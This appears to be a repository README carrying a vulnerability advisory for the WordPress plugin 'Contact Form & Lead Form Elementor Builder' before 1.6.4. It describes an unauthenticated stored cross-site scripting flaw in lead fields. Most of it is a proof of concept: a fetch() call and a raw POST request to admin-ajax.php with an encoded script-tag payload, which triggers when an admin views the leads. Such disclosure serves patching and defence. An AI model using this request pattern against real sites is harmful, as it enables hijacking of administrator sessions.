.. | |||
README.md | Loading last commit info... |
README.md
Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads
Proof of Concept
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data",
"method": "POST",
});
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 136
Connection: close
name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data
The XSS will be triggered when viewing the Leads at https://example.com/wp-admin/admin.php?page=all-form-leads